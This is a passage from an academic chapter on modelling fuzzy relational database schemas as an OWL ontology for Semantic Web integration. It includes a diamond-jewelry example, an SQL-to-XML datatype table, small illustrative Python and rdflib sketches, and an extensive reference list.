5. FUZZY NEARNESS DEF relation, storing information about similarity relations between every pair of values of a Fuzzy Data Type 3 attribute; and
6. FUZZY QUALIFIERS DEF relation, storing the minimum threshold that is assigned to every qualifier and is defined on a linguistic label.
A fuzzy database schema, however, only uses two of these relations in its definition: the FUZZY COL LIST relation (used whenever a fuzzy attribute is defined in the system) and the FUZZY APPROX MUCH relation (used when a Fuzzy Data Type 2 attribute is defined in order to establish restrictions on its domain). The remaining relations store concrete information, that is, the labels and discrete values used in tuple definitions (this representation is beyond the scope of this chapter). A simplified sketch of such catalog entries follows.
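To make the role of these catalog relations more concrete, the sketch below models in Python the kind of metadata a fuzzy schema definition might contribute to the FMB. The field names and values are simplified assumptions for illustration only and do not reproduce the actual FIRST catalog layout (see Medina et al., 1995).

```python
from dataclasses import dataclass


@dataclass
class FuzzyColEntry:
    """Simplified stand-in for a FUZZY COL LIST row: one entry per column that
    holds fuzzy data or can be fuzzily queried."""
    table_name: str
    column_name: str
    fuzzy_type: int   # 1 = CRISP, 2 = POSSIBILISTIC, 3 = SCALAR
    length: int = 0   # e.g., number of labels allowed for a type 3 column


@dataclass
class ApproxMuchEntry:
    """Simplified stand-in for a FUZZY APPROX MUCH row: domain restrictions for a
    type 2 column ("approximately", "much greater than", ...)."""
    table_name: str
    column_name: str
    margin: float     # half-width used when building "approximately x" distributions
    much: float       # distance regarded as "much greater/less than"


# Hypothetical entries for the jewelry schema used later in the chapter.
fuzzy_col_list = [
    FuzzyColEntry("RING", "PRICE", fuzzy_type=1),
    FuzzyColEntry("RING", "SIZE", fuzzy_type=2),
    FuzzyColEntry("DIAMOND", "COLOR", fuzzy_type=3, length=10),
]
fuzzy_approx_much = [ApproxMuchEntry("RING", "SIZE", margin=0.5, much=3.0)]
```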
Integration of Information

A great number of systems have already been developed to enable a wide variety of data from many different sources to be integrated. Ontology integration (Choi et al., 2006; Hameed, Preece, & Sleeman, 2004; Noy, 2004) is one of the main goals because of the increasing number of these representations today. Yet it is not the only application area, since the Semantic Web has facilitated access to many different kinds of information represented in different formats and even in different languages. Some examples of these different schema types are: relational schemas (represented with SQL), XML (using document type definition and XML schema definition), document schemas, and ontologies (using OWL or RDF) (Hai, 2005). The integration of information is not, therefore, a simple problem. George (2005) summarizes several kinds of schema heterogeneity and dimensions of integration, and establishes three dimensions:
1. System Integration, representing the heterogeneity in the platform where the information is represented;
2. Schema Integration, representing the heterogeneity between schemas. He identifies five tasks in this process: (a) pre-integration: schema translation into common data model form; (b) comparison: process of semantic conflict identification; (c) conformance: making conflicts compatible for merging by similar representation; (d) merging: integrating schemas; and (e) restructuring: refining the schema; and
3. Semantic Integration, resolving differences in conceptual data representation by determining equivalence between schema constructs.
Although most approaches for integrating information are based on schema integration techniques from database disciplines, there are certain differences between ontologies and databases, as outlined by Kalfoglou and Schorlemmer (2003), and the two approaches in the process of integrating schemas are: local as view, and global as view (Goguen, 2005). Global as view deals with establishing a generic domain representation (a global schema) to which local schemas map; this technique is widely used (Aparcio, Farias, & dos Santos, 2005). Meanwhile, local as view involves establishing direct correspondences among different local schemas. There are various proposals for schema and ontology matching. For example, MAPONTO (An et al., 2004) is a tool that uses logic to establish mappings between ontologies and relational databases. COMA++ (Aumueller, Do, Massmann, & Rahm, 2005) is a tool that solves matching problems between schemas and ontologies written in different languages such as SQL, W3C XSD, and OWL. GLUE (Doan, Madhavan, Domingos, & Halevy, 2002) and Ontomap (Gal, Modica, Jamil, & Eyal, 2005) are other examples of tools used for automated schema matching. In this work, we attempt to establish a frame in order to develop a tool for integrating fuzzy database schemas with the remaining structures found in the Semantic Web, and we have therefore identified two dimensions in this frame:
Due to the specific characteristics of the final dimension, semantic integration, it will be studied once the previous two dimensions have been developed. The global as view approach, however, will be used to establish correspondences between different schemas. A fuzzy DB schema representation would then set up a flexible global schema to which local schemas map. An ontology for representing a fuzzy database is presented in the following section.
USING AN ONTOLOGY TO REPRESENT FUZZY DATABASES IN THE SEMANTIC WEB

Fuzzy DBs add semantics to the information in the database, making it more interesting and valuable, and enabling it to be queried and stored more flexibly. For this, the structure that represents the fuzzy information (metadata) should be published and formally defined, so that users or intelligent agents can access and exploit it automatically. The Semantic Web is enriched by integrating this kind of information into its query results. Fuzzy extensions to the relational database model, however, are not a new problem. The definition process of fuzzy information on the
system is not as direct as the definition of the classic one, and good knowledge about how the catalog has been extended so as to define fuzzy data is a basic user requirement. The problem is accentuated when new data types, structures, or representations are included in the fuzzy system, making the catalog hard to manage. This is the case studied in Blanco, Martinez-Cruz, et al. (2005b), where fuzzy RDBMSs are extended in order to manage logical rules for making deductions with fuzzy data and to represent data mining operations using fuzzy data. As we mentioned before, the catalog structures required for representing fuzzy data types need to be explicitly defined in the RDBMS. Moreover, the defined schemas of the fuzzy databases need to store information in the catalog so that the system can manage the database properly. The description of this extra fuzzy information prevents the use of already-developed tools for interchanging information between RDBMSs. These problems make processes like sharing, merging, recycling, comparing, sending, or exploiting schemas or information more difficult than we could wish for.
Figure 4 represents the problem of integrating fuzzy DB schemas with other representation models or technologies. Section A represents how an FDB schema must establish individual mappings in order to share its contents. The solution to this problem is shown in Section B. This consists of defining an interface that keeps the knowledge representation (logical model) of the fuzzy schema separate from its storage place (the DBMS). The mapping must then be defined only once, from the ontology to the destination resources. This interface uses an ontology that formalizes the SQL standard, including the fuzzy data types defined in the GEFRED model (Medina et al., 1994). In addition, this proposal extends the SQL standard for defining fuzzy tables and columns. Instances of the proposed ontology store the definition of the database schemas, the domains of the attributes, and their default values. These schema representations are therefore independent of any concrete RDBMS representation.
Figure 4. Solution to the fuzzy data representation problem
The ontology representing the extended fuzzy RDBMSs (FRDBMSs) also uses OWL (the Web Ontology Language) (Antoniou & Harmelen, n.d.) so that it is accessible on the Web and understandable by most agents and currently developed applications.
Ontology Description

The ontology that defines the extension of the SQL 2003 standard for representing fuzzy data can be divided into the following two sub-ontologies: the fuzzy data type ontology and the fuzzy schema ontology.
Fuzzy Data Type Ontology

The SQL standard (in particular, SQL:2003) defines three kinds of data types: predefined types (also known as "built-in data types"), constructed data types, and user-defined data types (more details can be found in ANSI/ISO/IEC International Standard (IS) Database Language SQL, Part 2: Foundation (SQL/Foundation), 1999; Calero et al., 2005; Information Technology Database Languages SQL, Parts 1 to 4 and 9 to 14, 2003), and these data types have already been represented using different knowledge representation methods. While one of these is based on the use
Figure 5. Taxonomy of predefined SQL data types with an extension with fuzzy data types in dashed line, and fuzzy data type ontology (Pardede & Wenny Rahayu, n.d.)
of an ontology to model all the SQL:2003 data types using UML notation (Calero et al., 2005), this representation lacks an explicit representation of the predefined data types that can be found in Pardede and Wenny Rahayu (n.d.) and in Figure 5, section A. Fuzzy data type representation, however, is not included in any of these. Rather than modifying the SQL standard data types, the proposed ontology extends them and in Figure 5, section A, they are represented by a dashed line. The extended hierarchy of the ontology is shown in Figure 5, section B, where both the standard data types (those which are on the first level of the Pardede hierarchy) and also the fuzzy data types defined in the FIRST architecture are represented. Fuzzy data types and the relations established with the predefined datatype hierarchy are given in further detail. There is a direct correspondence between the predefined SQL data types and data types represented with OWL, as shown in Table 1.
Fuzzy Schema Ontology

A sub-ontology represents the SQL standard schema, which allows any relational database schema to be maintained independently of its DBMS implementation. Once the schema has been loaded into the ontology as a set of instances, it can be imported or exported to another DBMS. It can even be exported to the Web so that its knowledge representation can be shared. Calero et al.'s (2005) representation models the SQL:2003 standard schemata as an ontology using UML notation, with the OCL language to define the constraints. The ontology is therefore translated into the OWL language once it has been adapted to represent fuzzy database structures. The class Column is classified into two subclasses: Base Column and Fuzzy Column (as shown in Figure 6), where the first represents classic columns and the second represents all the fuzzy attributes.
Table 1. Correspondence between SQL data types and XML data types

SQL Data Type | XML Data Type | Facet
String, Bit, Fixed | xsd:hexBinary or xsd:base64Binary | no facet
String, Bit, Varying | xsd:hexBinary or xsd:base64Binary | xsd:maxLength
String, Character, Fixed | xsd:string | xsd:length
String, Character, Varying | xsd:string | xsd:maxLength
String, Character, Clob | xsd:string | xsd:maxLength
Boolean | xsd:boolean | no facet
Interval | xsd:duration | xsd:pattern
Numeric, Exact, Numeric | xsd:decimal | xsd:precision, xsd:scale
Numeric, Exact, Decimal | xsd:decimal | xsd:precision, xsd:scale
Numeric, Integer | xsd:integer | xsd:maxInclusive, xsd:minInclusive
Numeric, SmallInt | xsd:integer | xsd:maxInclusive, xsd:minInclusive
Numeric, BigInt | xsd:integer | xsd:maxInclusive, xsd:minInclusive
Numeric, Approx, Real | xsd:float, xsd:double | no facet
Numeric, Approx, Double Precision | xsd:float, xsd:double | no facet
Numeric, Approx, Float | xsd:float, xsd:double | no facet
DateTime, Date | xsd:date | xsd:pattern
DateTime, Time | xsd:time | xsd:pattern
DateTime, T.Stamp | xsd:dateTime | xsd:pattern
Fuzzy attributes do not relate to any constraint class because they cannot be a foreign key or a primary key in the schema. The original Calero ontology, on the other hand, is pruned, and the resulting ontology lacks a representation of the SQL objects, since these are not necessary to reach our goals. A brief sample of the resulting ontology (represented in the OWL language) is shown in Figure 7 and Figure 8. Figure 7 shows the code for describing the Fuzzy Column class, its attributes, relations, and constraints. In this ontology, the table and column classes are defined as metaclasses (both are subclasses of owl:Class). These metaclasses allow us to define all the tables and attributes described in the schema as classes. Figure 8 describes the class Table and shows the definition of this characteristic. Both sub-ontologies are connected by means of a specific property that joins the classes Datatypes and Columns, as in Calero et al. (2005).
Figure 6. Fuzzy schema ontology
The relation hasDataType establishes the connection between datatypes and columns. This connection is represented in Figure 6. The translation process of this ontology from its UML representation into OWL is direct. The following matching rules are applied (a minimal illustrative sketch follows the list):
• UML classes as ontology classes;
• UML attributes as datatype properties;
• UML relations as object properties;
• UML cardinality relations as cardinality restrictions;
• UML closed values as owl:oneOf restrictions; and
• UML logical restrictions as Boolean restrictions (e.g., owl:unionOf).
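As an illustration of these correspondences, and of the metaclass treatment of the Table and Column classes described above, the following minimal sketch builds a few such axioms with Python and the rdflib library. It is not the chapter's ontology: the namespace and the names ex:Table, ex:Column, ex:FuzzyColumn, and ex:hasDataType are placeholders.

```python
from rdflib import BNode, Graph, Literal, Namespace
from rdflib.namespace import OWL, RDF, RDFS, XSD

EX = Namespace("http://example.org/fuzzydb#")  # placeholder namespace
g = Graph()
g.bind("ex", EX)
g.bind("owl", OWL)

# UML classes as ontology classes; FuzzyColumn specializes Column.
for cls in (EX.Table, EX.Column, EX.FuzzyColumn, EX.DataType):
    g.add((cls, RDF.type, OWL.Class))
g.add((EX.FuzzyColumn, RDFS.subClassOf, EX.Column))

# Metaclass treatment (OWL Full): instances of ex:Table are themselves classes,
# so each table defined in a schema becomes a class of its own.
g.add((EX.Table, RDFS.subClassOf, OWL.Class))
g.add((EX.Column, RDFS.subClassOf, OWL.Class))

# UML attributes as datatype properties.
g.add((EX.columnName, RDF.type, OWL.DatatypeProperty))
g.add((EX.columnName, RDFS.domain, EX.Column))
g.add((EX.columnName, RDFS.range, XSD.string))

# UML relations as object properties (e.g., the hasDataType link).
g.add((EX.hasDataType, RDF.type, OWL.ObjectProperty))
g.add((EX.hasDataType, RDFS.domain, EX.Column))
g.add((EX.hasDataType, RDFS.range, EX.DataType))

# UML cardinality as an OWL restriction: every column has exactly one data type.
restriction = BNode()
g.add((restriction, RDF.type, OWL.Restriction))
g.add((restriction, OWL.onProperty, EX.hasDataType))
g.add((restriction, OWL.cardinality, Literal(1, datatype=XSD.nonNegativeInteger)))
g.add((EX.Column, RDFS.subClassOf, restriction))

print(g.serialize(format="turtle"))
```

Serializing to Turtle or RDF/XML keeps the result readable by the tools mentioned in this chapter, such as Protégé or Jena.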
More detailed correspondences between OWL and UML are explained in Falkovych, Sabou, and Stuckenschmidt (2003); and Brockmans, Volz, Eberhart, and Loffler (2004).
Figure 7. Fuzzy column class represented in OWL
Figure 8. Table class represented in OWL
Example

In this section, we will show an example of a database schema that includes fuzzy attributes in its definition. The selected example is a jewelry database (Figure 9) which represents the gemstones contained in jewelry pieces. We present a semi-completed schema (since the classes of all existing gemstones are not represented). Only some of the most significant elements will be described in this example for reasons of space. Surprisingly, diamonds have always had fuzzy attributes among their features. Some of their characteristics are normally represented with linguistic labels, for example, the clarity and color attributes. Table 3 and Table 4 show these labels, respectively. As we can see, a fuzzy representation would allow these labels to be inferred, giving a membership degree when a precise value is not known.
Figure 9. Example of fuzzy database schema
Table 3. Labels for representing diamond clarity

Label | Description
FL | Flawless
IF | Internally Flawless
VVS (VVS1, VVS2) | Very very small internal inclusions
VS (VS1, VS2) | Very small internal inclusions
SI (SI1, SI2, SI3) | Small inclusion
P | Piqué
I (I1, I2, I3) | Imperfect

Table 4. Labels for representing diamond color

Label | Description
D, E, F | Colorless
G, H, I, J | Nearly colorless
K, L, M | Faint Yellow
N, O, P, Q, R | Very Light Yellow
S, T, U, V, W, X, Y, Z | Light Yellow
Even more generic labels can be generated in order to facilitate valuation by using a degree. For example, if we say that a diamond has the color Yellow with a degree of 0.5, then we can infer that it is of type W. These attributes can therefore be defined as Fuzzy Data Type 3, that is, using discrete values with a similarity relation between them. Although the diameter of a ring has a numeric value, a ring size can also be defined using linguistic labels in order to establish generic sizes (e.g., S, M, L, XL, XXL), which is why this is a Fuzzy Type 2 attribute. Fuzzy Type 1 is defined when we want to fuzzily query an attribute whose values cannot be fuzzily stored. This situation could occur with the price attribute in the jewelry database, for example, if we want to know which rings are considered "cheap".
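The following minimal sketch (Python, with invented similarity degrees) illustrates how a Fuzzy Data Type 3 attribute such as the diamond color could behave: a set of discrete labels together with a symmetric resemblance relation that yields a degree when two labels are compared. The degrees shown are assumptions for illustration; in FIRST they would be stored in the FUZZY NEARNESS DEF relation.

```python
# Hypothetical resemblance degrees between generic color labels; real values
# would be chosen by a domain expert and stored in the fuzzy meta-knowledge base.
SIMILARITY = {
    ("Colorless", "Nearly colorless"): 0.8,
    ("Nearly colorless", "Faint Yellow"): 0.6,
    ("Faint Yellow", "Very Light Yellow"): 0.7,
    ("Very Light Yellow", "Light Yellow"): 0.8,
    ("Colorless", "Light Yellow"): 0.1,
}


def resemblance(a: str, b: str) -> float:
    """Degree to which two color labels resemble each other (1.0 for identical labels)."""
    if a == b:
        return 1.0
    return SIMILARITY.get((a, b), SIMILARITY.get((b, a), 0.0))


# A fuzzy condition such as "color is approximately Colorless" with threshold 0.7
# would accept "Nearly colorless" (0.8) but reject "Light Yellow" (0.1).
print(resemblance("Nearly colorless", "Colorless"))   # 0.8
print(resemblance("Colorless", "Light Yellow"))       # 0.1
```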
The resulting ontology of the jewelry schema consists of a set of instances of the previously defined ontology. Various parts of the OWL code show how this schema is represented below. Figure 10 and Figure 11 represent instances of the classes Table, Columns, and Datatypes, respectively.
Figure 10. Instantiation of the class Table and the class Columns in OWL code

Applications

Developing fuzzy schemas as ontologies is an attempt to facilitate the process of integrating information between fuzzy databases and other representations. As described in the previous sections, fuzzy databases have their own representations and languages, which further complicates the use of existing schema mapping tools. In this work, various operations relating to fuzzy database integration have emerged (as shown in Figure 12), and these basically consist of:
• Exporting a schema to several heterogeneous DBMSs (as shown in Figure 12, section A);
• Interchanging data between different homogeneous schemas or DBMSs (as shown in Figure 12, section B); and
• Integrating different schemas from heterogeneous sources into a single merged schema (as shown in Figure 12, section C).
This last one is the most complex problem to resolve, and many approaches have been proposed
for this. The main difficulty in resolving this problem is due to the enormous variety of schemas (as mentioned in the previous section). Nevertheless, fuzzy database schema integration should not increase the complexity of this problem, due to the flexibility of the data represented in such schemas.
Figure 11. Instantiation of the class Datatypes in OWL code

DISCUSSION

Although there are a large number of approaches for representing fuzzy data in database management systems, this information has not spread beyond the database discipline. Current knowledge representation mechanisms, such as ontologies, represent relational database schemas in many formats, but they all store classical information, and it is extremely difficult to find the fuzzy data representation structures used in the fuzzy database environment. In this chapter, we have proposed an ontology for such schemas, and this definition helps fuzzy database users access their information using new data management techniques such as the Semantic Web. Our next task is to develop a framework that will allow us to represent the domain ontology defined by the instances of this ontology. These instances, which represent an FDB schema, would be transformed into a new domain ontology, and this ontology should have classes, properties, and restrictions represented as a hierarchy. This
representation is obviously closely related to a relational database structure, although its instances are directly related to the tuples in the represented database. On the other hand, special structure definitions are required in order to store fuzzy values in the ontology. For example, it should be possible to define distribution functions in the same way that the varying-string structure is defined. The defined ontology can be considered a general ontology (or perhaps a meta-ontology) due to the metaclasses that it contains. This is the case for the classes Table and Columns. When these classes are instantiated, new classes should be generated in order to allow the tuples relating to them to be defined. More applications can be found for the representation of fuzzy schemas as ontologies.
Figure 12. Schema exportation to several DBMS
These schemas are more flexible in the integration process due to the flexibility of their elements. Uncertain or imprecise data are not very restrictive when a matching rule attempts to map one representation to another, and so sometimes a membership degree is the only requisite. Fuzzy database schemas also enrich the heterogeneity of the Semantic Web. New database content can
be reached and processed computationally if required. Public descriptions of databases (with fuzzy or classical data) are necessary in the Semantic Web, and allow access to database information that is not available as an HTML Web page. This happens because database owners do not always want to develop a back-end interface for Web access, even though their databases are available to the public. New opportunities for developing applications (or services) enabling automatic access to public database content will emerge. Fuzzy schemas have been represented as an ontology using the OWL language because it is independent of any tool or concrete representation structure. It has also been defined as a standard by the W3C, and most tools representing ontologies can read and handle this format. OWL, however, is a complex language with extremely lengthy definitions. Writing OWL code by hand is a very tedious process and it is very easy to make mistakes when doing so. Most OWL ontologies are developed using an ontology management tool and then translated. Another option is to develop an OWL editor. Although there are several tools for working with OWL ontologies, we chose Jena (Programme, n.d.) because it provides a well-documented API for managing OWL elements. There are libraries such as OWL API (Bechhofer, n.d.) or Sesame (Kampman & Broekstra, n.d.), but these are less intuitive than Jena. Another alternative is to develop a plugin for an existing ontology management system, but this has not been done, as all these tools use their own local representation structures. This work only attempts to extend the contents of the Semantic Web rather than to analyze the limited success of the Semantic Web to date. There have been many developments in the framework of ontology definition and knowledge representation but, as McCool (2005) analyzed in his work, not enough applications or services have been developed so far. This proposal is therefore
expected to be used by a large number of Semantic Web clients in the near future.
CONCLUSION

Although integration techniques and tools for reconciling schemas from heterogeneous sources (including databases) have often been proposed, there is no information about how to represent the fuzzy data stored in fuzzy database management systems in order to make it accessible in the Semantic Web. This work proposes a frame for representing fuzzy schema structures as ontologies. This work also brings new advantages to the information retrieval process in the Semantic Web, since it enables an ontology to be used to retrieve schemas from all types of databases. This information is used to access public databases by means of client interfaces which are available online. This access can be made by the end users or automatically by agents. By treating the schemas represented with this proposal as ontology data, users can then exploit them with all of the developed technologies for managing ontologies, and some of the operations that can be performed with ontologies are: comparing, pruning, importing, exporting, evaluating, integrating, mapping, merging, alignment, reasoning, and so forth.
REFERENCES

An, Y., Borgida, A., & Mylopoulos, J. (2004). Refining mappings from relational tables to ontologies. Proceedings of the VLDB Workshop on the Semantic Web and Databases (SWDB '04) (pp. 57-62).
ANSI/ISO/IEC International Standard (IS) Database Language SQL, Part 2: Foundation (SQL/Foundation) (1999). ISO/IEC 9075-2:1999 (E).
Antoniou, G., & van Harmelen, F. (n.d.). Web ontology language: OWL. In S. Staab & R. Studer (Eds.), Handbook on ontologies (pp. 67-93). Springer-Verlag.
Aparcio, A. S., Farias, O. L. M., & dos Santos, N. (2005). Applying ontologies in the integration of heterogeneous relational databases. Proceedings of the 2005 Australasian Ontology Workshop (AOW '05) (pp. 11-16). Darlinghurst, Australia: Australian Computer Society, Inc.
Arperez, J. C., Corcho, O., Fernandez-Lopez, M., & Gómez-Pérez, A. (2001). WebOde: A scalable workbench for ontological engineering. Proceedings of the 1st International Conference on Knowledge Capture (K-CAP '01) (pp. 6-13). New York: ACM Press.
Aumueller, D., Do, H.-H., Massmann, S., & Rahm, E. (2005). Schema and ontology matching with COMA++. Proceedings of the 2005 ACM SIGMOD International Conference on Management of Data (SIGMOD '05) (pp. 906-908). New York: ACM Press.
Baldwin, J. F., & Zhou, S. Q. (1984). A fuzzy relational inference language. Fuzzy Sets and Systems (14), 155-174.
Barrasa, J., Corcho, O., & Perez, A. G. (2003). Fund finder: A case study of database to ontology mapping. International Semantic Web Conference, Lecture Notes in Computer Science, 2870 (pp. 17-22). Springer-Verlag.
Bechhofer, S. (2007). API for OWL ontologies. Retrieved from http://owl.man.ac.uk/api/readme.html
Berners-Lee, T., Hendler, J., & Lassila, O. (2001). The semantic Web. Scientific American, 284(5), 28-37.
Bizer, C. (2003). D2R map—A database to RDF mapping language. Proceedings of the 12th International World Wide Web Conference (pp. 17-22).
Blanco, I., Martínez-Cruz, C., Marín, N., & Vila, M. A. (2005a). About the use of ontologies for fuzzy knowledge representation. Proceedings of the International Conference in Fuzzy Logic and Technology, EUSFLAT 2005 (pp. 106-111). Blanco, I., Martínez-Cruz, C., Serrano, J., & Vila, M. (2005b). A first approach to multipurpose relational database server. Mathware and Soft Computing, 12(2-3), 129-153. Breu, M., & Ding, Y. (2004). Modelling the world: Databases and ontologies. Whitepaper by IFI, Institute of Computer Science, University of Innsbruck. Brockmans, S., Volz, R., Eberhart, A., & Loffler, P. (2004). Visual modeling of OWL DL ontologies using UML. The Semantic Web, ISWC 2004, Lecture Notes in Computer Science, 3298 ( pp. 198-213). Berlin: Springer-Verlag. Buckles, B. P., & Petry, F. E. (1982). A fuzzy representation of data for relational databases. Fuzzy Sets and Systems (7), 213-226. Calero, C., Ruiz, F., Baroni, A., Brito e Abreu, F., & Piattini, M. (2005). An ontological approach to describe the SQL:2003 object-relational features. Computer Standards and Interfaces Journal, 28(6), 695-713. Carrasco, R. A., Vila, M. A., & Galindo, J. (2003). FSQL: A flexible query language for data mining. Enterprise Information Systems 4, 68-74. Chandrasekaran, B., Josephson, J., & Benjamins, V. (1999). What are ontologies, and why do we need them? IEEE Intelligent Systems, 14(1), 20-26. Chen, G. Q. (Ed.) (1999). Fuzzy logic in data modeling; Semantics, constraints, and database design. Kluwer Academic Publisher. Chen, G. Q., Vandenbulcke, J., & Kerre, E. E. (1992). A general treatment of data redundancy in a fuzzy relational data model. Journal of the American Society of Information Sciences (3), 304-311.
Choi, N., Song, I.-Y., & Han, H. (2006). A survey on ontology mapping. SIGMOD Record, 35(3), 34-41.
Doan, A., Madhavan, J., Domingos, P., & Halevy, A. (2002). Learning to map between ontologies on the semantic Web. Proceedings of the Eleventh International WWW Conference (pp. 662-673). Hawaii.
Dou, D., & LePendu, P. (2006). Ontology-based integration for relational databases. Proceedings of the 2006 ACM Symposium on Applied Computing (SAC '06) (pp. 461-466). New York: ACM Press.
Dou, D., LePendu, P., Kim, S., & Qi, P. (2006). Integrating databases into the semantic Web through an ontology-based framework. Proceedings of the 22nd International Conference on Data Engineering Workshops (ICDEW '06) (p. 54). Washington, DC: IEEE Computer Society.
Duineveld, A. J., Stoter, R., Weiden, M. R., Kenepa, B., & Benjamins, V. R. (2000, June). Wonder-tools? A comparative study of ontological engineering tools. International Journal of Human-Computer Studies, 52(6), 1111-1133.
Eriksson, U. (n.d.). LIBSDB: Database library for supporting multiple database management. Retrieved from http://siag.nu/libsdb/
Falkovych, K., Sabou, M., & Stuckenschmidt, H. (2003). UML for the semantic Web: Transformation-based approaches. Knowledge Transformation for the Semantic Web, 92-106.
Finin, T., Mayfield, J., Joshi, A., Cost, R. S., & Fink, C. (2005). Information retrieval and the semantic Web. Proceedings of the 38th Annual Hawaii International Conference on System Sciences (HICSS '05), Track 4 (p. 113.1). Washington, DC: IEEE Computer Society.
Gal, A., Modica, G., Jamil, H., & Eyal, A. (2005). Automatic ontology matching using application semantics. AI Magazine, 26(1), 21-31.
Galindo, J., Urrutia, A., & Piattini, M. (Eds.). (2006). Fuzzy databases modeling, design, and implementation. Hershey, PA: Idea Group Publishing.
Gennari, J., Nguyen, M., & Silberfein, A. (n.d.). Datagenie. Retrieved from http://protege.cim3.net/cgi-bin/wiki.pl?DataGenie
George, D. (2005). Understanding structural and semantic heterogeneity in the context of database schema integration. Journal of the Department of Computing (pp. 29-44). UCLan: IEEE Computer Society.
Goble, C. (2003). Guest editorial: The semantic Web: An evolution for a revolution. Computer Networks, 42(5), 551-556.
Goguen, J. A. (2005). Data, schema, ontology, and logic integration. Logic Journal of the IGPL, 13(6), 685-715.
Gómez-Pérez, A., Férnandez-López, M., & Corcho-García, O. (2003a). Methodologies, tools, and languages for building ontologies. Where is their meeting point? Data and Knowledge Engineering (46), 41-64.
Gómez-Pérez, A., Férnandez-López, M., & Corcho-García, O. (2003b). Ontological engineering. New York: Springer-Verlag, Inc.
Gruber, T. R. (1993). Toward principles for the design of ontologies used for knowledge sharing (Tech. Rep. KSL 93-04). Stanford, CA: Knowledge Systems Laboratory, Stanford University.
Guarino, N. (1995). Formal ontology, concept analysis and knowledge representation. International Journal of Human and Computer Studies, 43(5/6), 625-640.
Guarino, N. (1998). Formal ontologies and information systems. Proceedings of FOIS '98 (pp. 3-15).
Hai, D. H. (2005). Schema matching and mapping-based data integration. Unpublished doctoral dissertation, Interdisciplinary Center for Bioinformatics and Department of Computer Science, University of Leipzig, Germany.
Hameed, A., Preece, A., & Sleeman, D. (2004). Ontology reconciliation. In S. Staab & R. Studer (Eds.), Handbook on ontologies (pp. 231-250). Springer.
Hendler, J., Berners-Lee, T., & Miller, E. (2002). Integrating applications on the semantic Web. Journal of the Institute of Electrical Engineers of Japan, 122(10), 676-680.
Hu, J., Nicholson, D., Mungall, C., Hillyard, A. L., & Archibald, A. L. (1996). WebinTool: A generic Web to database interface building tool. Proceedings of the 7th International Workshop on Database and Expert Systems Applications (DEXA '96) (p. 285). Washington, DC: IEEE Computer Society.
Information Technology Database Languages SQL, Parts 1 to 4 and 9 to 14 (2003). 9075-1:2003 to 9075-14:2003 International Standards.
Kacprzyk, J., & Zadrozny, S. (2001). SQLF and fQuery for access. Proceedings of the Joint 9th IFSA World Congress and 20th NAFIPS International Conference: Vol. 4 (pp. 2464-2469).
Kalfoglou, Y., & Schorlemmer, M. (2003). Ontology mapping: The state of the art. The Knowledge Engineering Review, 18(1), 1-31.
Kampman, A., & Broekstra, J. (n.d.). Sesame. Retrieved from http://www.openrdf.org/
Lassila, O., & McGuinness, D. (2002). The role of frame-based representation on the semantic Web, KSL-01-02 (Tech. Rep.). Stanford, CA: Knowledge Systems Laboratory, Stanford University.
Lausen, H., & Stollberg, M. (2004, April). Semantic Web portals—State of the art survey (Tech. Rep. 2004-04-03). DERI, Digital Enterprise Research Institute.
Lennat, D. (1995). CYC: A large-scale investment in knowledge infrastructure. Communications of the ACM, 33(8), 33-38. Ma, Z. (2005). Fuzzy database modeling with XML. Springer. Ma, Z. (2006). Fuzzy database modeling of imprecise and uncertain engineering information. Springer. McCool, R. (2005). Rethinking the semantic Web, part I. IEEE Internet Computing, 86-88. McCool, R. (2006). Rethinking the semantic Web, part II. IEEE Internet Computing, 93-96. Medina, J. M., Pons, O., & Vila, M. A. (1994). GEFRED: A generalized model of fuzzy relational databases. Information Sciences, 76 (1-2), 87-109. Medina, J. M., Vila, M. A., Cubero, J. C., & Pons, O. (1995). Towards the implementation of a generalized fuzzy relational database model. Fuzzy Sets and Systems, 75, 273-289. Mena, E., & Illarramendi, A. (2001). Ontologybased query processing for global information systems. Norwell, MA: Kluwer Academic Publishers. Noy, N. F. (2004). Semantic integration: A survey of ontology-based approaches. SIGMOD Record, 33(4), 65-70. Noy, N. F., & Hafner, C. D. (1997). The state of the art in ontology design. A survey and comparative review. The American Association for Artificial Intelligence, (18), 53-74. Ontological Engineering Group (OEG) from the Artificial Intelligence Department of the Computer Science Faculty (FI) from the Technical University of Madrid (Spain). (n.d.). WebOde Ontology Engineering Platform. Retrieved from http://webode.dia.fi.upm.es/WebODEWeb/index. html
Network of Excellence INTEROP, (2004, November). Ontology-based integration of Enterprise Modelling and Architecture & Platforms, Deliverable D8.1, State of the Art and State of Practice Including Initial Possible Research Orientations, Version 1.2, p. 12. Retrieved from www.interop-noe.org Open University (n.d.). WebOnto. Retrieved from http://webonto.open.ac.uk/ Oracle (n.d.). ISQLplus Web environment. Retrieved from http://150.214.108.124/isqlplus Pardede, E., & Wenny Rahayu, J. (n.d.). Impact of new SQL standard to database modeling. Retrieved from http://homepage.cs.latrobe.edu. au/ekpardede/paper/ENCYCLOPEDIA05-1.pdf P´erez de Laborda, C., & Conrad, S. (2005). Relational.OWL: A data and schema representation format based on OWL. Proceedings of the 2nd Asia-Pacific Conference on Conceptual Modelling (CRPIT ’43) (pp. 89–96). Darlinghurst, Australia: Australian Computer Society, Inc. Petry, F. E. (1996). Fuzzy databases: Principles and applications. Kluwer Academic Publishers. Prade, H., & Testemale, C. (1984). Generalizing database relational algebra for the treatment of incomplete/uncertain information and vague queries. Information Sciences (34), 113-143. Programme, H. L. S. W. (n.d.). Jena: A semantic Web framework for Java. Raju, K. V. S. V. N., & Majumdar, A. K. (1988). Fuzzy functional dependencies and lossless join decomposition of fuzzy relational database systems. ACM Transactions on Database Systems, 13(2), 129-166. Resource Description Framework (RDF) (1999). Retrieved from http://www.w3.org/RDF/ Roche, C. (2003). Ontology: A survey. Proceedings of the 8th Symposium on Automated Systems
2469
Looking for Information in Fuzzy Relational Databases Accessible Via Web
